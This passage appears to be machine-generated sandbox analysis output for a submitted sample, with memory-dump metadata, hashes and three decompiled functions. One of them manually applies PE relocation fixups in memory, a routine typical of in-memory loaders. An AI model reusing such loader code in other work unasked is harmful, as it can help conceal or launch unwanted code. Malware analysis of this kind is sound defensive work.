                    0x03261dcd
                    0x03261dcd
                    0x03261db3
                    0x03261db6
                    0x03261db6
                    0x03261dd2
                    0x03261dd8
                    0x03261ddc
                    0x03261de2
                    0x03261de9
                    0x03261de9
                    0x03261dee
                    0x03261dfb
                    0x03261d3c
                    0x03261d3c
                    0x03261d42
                    0x03261dfc
                    0x03261e00
                    0x03261e05
                    0x03261e07
                    0x03261e11
                    0x03261e18
                    0x03261e18
                    0x03261e23
                    0x03261d48
                    0x03261d48
                    0x00000000
                    0x03261d48
                    0x03261d42
                    0x03261d2c
                    0x03261d30
                    0x03261d30
                    0x03261d2a
                    0x03261d1f
                    0x03261c7c
                    0x03261c7c
                    0x03261c82
                    0x03261c87
                    0x03261cc4
                    0x03261cc5
                    0x03261ccb
                    0x03261cd2
                    0x03261cd7
                    0x03261cd9
                    0x03261cdb
                    0x03261ce1
                    0x03261ce3
                    0x03261ce3
                    0x03261cea
                    0x03261cef
                    0x03261cf3
                    0x03261cf8
                    0x03261cfd
                    0x03261cfd
                    0x03261d02
                    0x03261c89
                    0x03261c92
                    0x03261c98
                    0x03261c9c
                    0x03261ca1
                    0x03261ca3
                    0x03261cad
                    0x03261cb4
                    0x00000000
                    0x03261cb9
                    0x03261cbd
                    0x03261c96
                    0x03261c96
                    0x03261c96
                    0x03261c92
                    0x03261c87

                    Memory Dump Source
                    • Source File: 00000000.00000002.761893695.0000000003261000.00000020.00001000.00020000.00000000.sdmp, Offset: 03260000, based on PE: true
                    • Associated: 00000000.00000002.761886979.0000000003260000.00000002.00001000.00020000.00000000.sdmp
                    • Associated: 00000000.00000002.761941452.0000000003289000.00000004.00001000.00020000.00000000.sdmp
                    • Associated: 00000000.00000002.761941452.0000000003393000.00000004.00001000.00020000.00000000.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_3260000_r096teIe1H.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: b18dee43a7853429a2897fb33ee297638859d3785755f4ac69cdd4909aa5672b
                    • Instruction ID: 758ea76fc036b0b17b63c35058c32b875be19ca9cca2935d3ae253be36a01601
                    • Opcode Fuzzy Hash: b18dee43a7853429a2897fb33ee297638859d3785755f4ac69cdd4909aa5672b
                    • Instruction Fuzzy Hash: 99A1C5677307014BD719EA7CAD843ADB3859FC4261F1C827EE115CB386EBA4F9E18290
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 76%
                    			E032694D0(void* __eax, void* __ebx, intOrPtr* __edx, void* __esi, intOrPtr _a4) {
                    				char _v8;
                    				short _v18;
                    				short _v22;
                    				struct _SYSTEMTIME _v24;
                    				char _v280;
                    				intOrPtr _v284;
                    				char* _t34;
                    				intOrPtr* _t50;
                    				intOrPtr _t59;
                    				void* _t64;
                    				intOrPtr _t66;
                    				void* _t70;
                    
                    				_v8 = 0;
                    				_t50 = __edx;
                    				_t64 = __eax;
                    				_push(_t70);
                    				_push(0x32695be);
                    				_push( *[fs:eax]);
                    				 *[fs:eax] = _t70 + 0xfffffee8;
                    				E032644A0(__edx);
                    				_v24 =  *(_a4 - 0xe) & 0x0000ffff;
                    				_v22 =  *(_a4 - 0x10) & 0x0000ffff;
                    				_v18 =  *(_a4 - 0x12) & 0x0000ffff;
                    				if(_t64 > 2) {
                    					E03264538( &_v8, 0x32695e0);
                    				} else {
                    					E03264538( &_v8, 0x32695d4);
                    				}
                    				_t34 = E03264964(_v8);
                    				if(GetDateFormatA(GetThreadLocale(), 4,  &_v24, _t34,  &_v280, 0x100) != 0) {
                    					E03264710(_t50, 0x100,  &_v280);
                    					if(_t64 == 1 &&  *((char*)( *_t50)) == 0x30) {
                    						_v284 =  *_t50;
                    						_t66 = _v284;
                    						if(_t66 != 0) {
                    							_t66 =  *((intOrPtr*)(_t66 - 4));
                    						}
                    						E032649C4( *_t50, _t66 - 1, 2, _t50);
                    					}
                    				}
                    				_pop(_t59);
                    				 *[fs:eax] = _t59;
                    				_push(E032695C5);
                    				return E032644A0( &_v8);
                    			}
















                    APIs
                    • GetThreadLocale.KERNEL32(00000004,?,00000000,?,00000100,00000000,032695BE), ref: 03269556
                    • GetDateFormatA.KERNEL32(00000000,00000004,?,00000000,?,00000100,00000000,032695BE), ref: 0326955C
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.761893695.0000000003261000.00000020.00001000.00020000.00000000.sdmp, Offset: 03260000, based on PE: true
                    • Associated: 00000000.00000002.761886979.0000000003260000.00000002.00001000.00020000.00000000.sdmp
                    • Associated: 00000000.00000002.761941452.0000000003289000.00000004.00001000.00020000.00000000.sdmp
                    • Associated: 00000000.00000002.761941452.0000000003393000.00000004.00001000.00020000.00000000.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_3260000_r096teIe1H.jbxd
                    Similarity
                    • API ID: DateFormatLocaleThread
                    • String ID: yyyy
                    • API String ID: 3303714858-3145165042
                    • Opcode ID: eaae9ac5ac24d7f626ed78fe0217e5ab6f8f2b12da5346bd1322b2dc626ffa68
                    • Instruction ID: dc22059fead599ebf68cd23bbe25064e0c68ca6f43136ea445093921a95de1dc
                    • Opcode Fuzzy Hash: eaae9ac5ac24d7f626ed78fe0217e5ab6f8f2b12da5346bd1322b2dc626ffa68
                    • Instruction Fuzzy Hash: CB21B775A242589FDB11EF69C851AEEB3F8EF49700F4100A5E944EB240DB70DEC4C7A5
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 81%
                    			E03272A2C(signed int __eax, void* __ebx, intOrPtr* __edx, void* __edi, void* __esi) {
                    				void* _v8;
                    				char _v264;
                    				char _v520;
                    				char _v524;
                    				void* _t20;
                    				signed char _t47;
                    				intOrPtr* _t59;
                    				intOrPtr _t61;
                    				intOrPtr* _t75;
                    				void* _t78;
                    
                    				_v524 = 0;
                    				_t75 = __edx;
                    				_t47 = __eax;
                    				_push(_t78);
                    				_push(0x3272b52);
                    				_push( *[fs:eax]);
                    				 *[fs:eax] = _t78 + 0xfffffdf8;
                    				_t73 = __eax & 0x00000fff;
                    				if((__eax & 0x00000fff) > 0x14) {
                    					__eflags = __eax - 0x100;
                    					if(__eax != 0x100) {
                    						__eflags = __eax - 0x101;
                    						if(__eax != 0x101) {
                    							_t20 = E03272E88(__eax,  &_v8);
                    							__eflags = _t20;
                    							if(_t20 == 0) {
                    								E03267A88( &_v524, 4);
                    								_t59 =  *0x329a958; // 0x3289828
                    								E032647B0(_t75, _v524,  *_t59);
                    							} else {
                    								E0326363C( *_v8,  &_v520);
                    								E03262D7C( &_v520, 0x7fffffff, 2,  &_v264);
                    								E03264704(__edx,  &_v264, __eflags);
                    							}
                    						} else {
                    							E032644F4(__edx, 0x3272b78);
                    						}
                    					} else {
                    						E032644F4(__edx, "String");
                    					}
                    				} else {
                    					E032644F4(__edx,  *((intOrPtr*)(0x3289a2c + (_t73 & 0x0000ffff) * 4)));
                    				}
                    				if((_t47 & 0x00000020) != 0) {
                    					E032647B0(_t75,  *_t75, "Array ");
                    				}
                    				if((_t47 & 0x00000040) != 0) {
                    					E032647B0(_t75,  *_t75, "ByRef ");
                    				}
                    				_pop(_t61);
                    				 *[fs:eax] = _t61;
                    				_push(0x3272b59);
                    				return E032644A0( &_v524);
                    			}














                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.761893695.0000000003261000.00000020.00001000.00020000.00000000.sdmp, Offset: 03260000, based on PE: true
                    • Associated: 00000000.00000002.761886979.0000000003260000.00000002.00001000.00020000.00000000.sdmp
                    • Associated: 00000000.00000002.761941452.0000000003289000.00000004.00001000.00020000.00000000.sdmp
                    • Associated: 00000000.00000002.761941452.0000000003393000.00000004.00001000.00020000.00000000.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_3260000_r096teIe1H.jbxd
                    Similarity
                    • API ID:
                    • String ID: Any$Array $ByRef $String
                    • API String ID: 0-2719049652
                    • Opcode ID: 817f449967aa834909fdc378992d26a111a33c07e2b738262d070d09a35fd0e3
                    • Instruction ID: 16bee31b054ea8b52d5fefc545b71e3a03fa1e89554bf05f912e4ff005242f85
                    • Opcode Fuzzy Hash: 817f449967aa834909fdc378992d26a111a33c07e2b738262d070d09a35fd0e3
                    • Instruction Fuzzy Hash: 7A213538730325CFC720FF28C9487A973E9FF89210F544992E5848B380DAB49DC18691
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 100%
                    			E0327A4D0(intOrPtr _a4, intOrPtr _a8, void* _a12, intOrPtr _a16, intOrPtr _a20) {
                    				unsigned int _v8;
                    				void* _v16;
                    				intOrPtr _v20;
                    				int _t22;
                    				void* _t36;
                    				void* _t43;
                    				void* _t45;
                    				void* _t46;
                    
                    				_t43 = _a12;
                    				_v20 = _a16 - _a4;
                    				_t36 = _a12 + 8;
                    				while(1) {
                    					_t22 = IsBadReadPtr(_t43, 8);
                    					if(_t22 != 0) {
                    						break;
                    					}
                    					_t22 = IsBadReadPtr(_t36, 4);
                    					if(_t22 != 0) {
                    						break;
                    					}
                    					_t22 = _a12 + _a20;
                    					if(_t22 > _t43) {
                    						_v8 =  *((intOrPtr*)(_t43 + 4)) - 8 >> 1;
                    						_t45 = _v8 - 1;
                    						if(_t45 < 0) {
                    							L8:
                    							_t43 = _t36;
                    							_t36 = _t36 + 8;
                    							continue;
                    						}
                    						_t46 = _t45 + 1;
                    						do {
                    							if(IsBadReadPtr(_t36, 4) == 0 && ( *_t36 & 0x0000ffff ^ 0x00003000) < 0x1000) {
                    								_v16 = ( *_t36 & 0x0000ffff) % 0x3000 +  *_t43 + _a8;
                    								if(IsBadWritePtr(_v16, 4) == 0) {
                    									 *_v16 =  *_v16 + _v20;
                    								}
                    							}
                    							_t36 = _t36 + 2;
                    							_t46 = _t46 - 1;
                    						} while (_t46 != 0);
                    						goto L8;
                    					}
                    					break;
                    				}
                    				return _t22;
                    			}












                    APIs
                    • IsBadReadPtr.KERNEL32(?,00000004,?,00000004,?,00000008), ref: 0327A504
                    • IsBadWritePtr.KERNEL32(?,00000004,?,00000004,?,00000004,?,00000008), ref: 0327A534
                    • IsBadReadPtr.KERNEL32(?,00000008), ref: 0327A553
                    • IsBadReadPtr.KERNEL32(?,00000004,?,00000008), ref: 0327A55F
                    Memory Dump Source
                    • Source File: 00000000.00000002.761893695.0000000003261000.00000020.00001000.00020000.00000000.sdmp, Offset: 03260000, based on PE: true
                    • Associated: 00000000.00000002.761886979.0000000003260000.00000002.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 00000000.00000002.761941452.0000000003289000.00000004.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 00000000.00000002.761941452.0000000003393000.00000004.00001000.00020000.00000000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_3260000_r096teIe1H.jbxd
                    Similarity
                    • API ID: Read$Write
                    • String ID:
                    • API String ID: 3448952669-0
                    • Opcode ID: 6129f2bbfa62dbd872cdb4acd30af957bfb5020b3cc7e497b347e76894bc1354
                    • Instruction ID: 63208cfbc68561894e9b21b3c6d67b01f1193fb162b6beb44f9ebb4cd7fca9f1
                    • Opcode Fuzzy Hash: 6129f2bbfa62dbd872cdb4acd30af957bfb5020b3cc7e497b347e76894bc1354
                    • Instruction Fuzzy Hash: 0921B771A5031A9BDF20CF58CC80B9E7778FF803A1F048555ED14A7340E774E9918790
                    Uniqueness

                    Uniqueness Score: -1.00%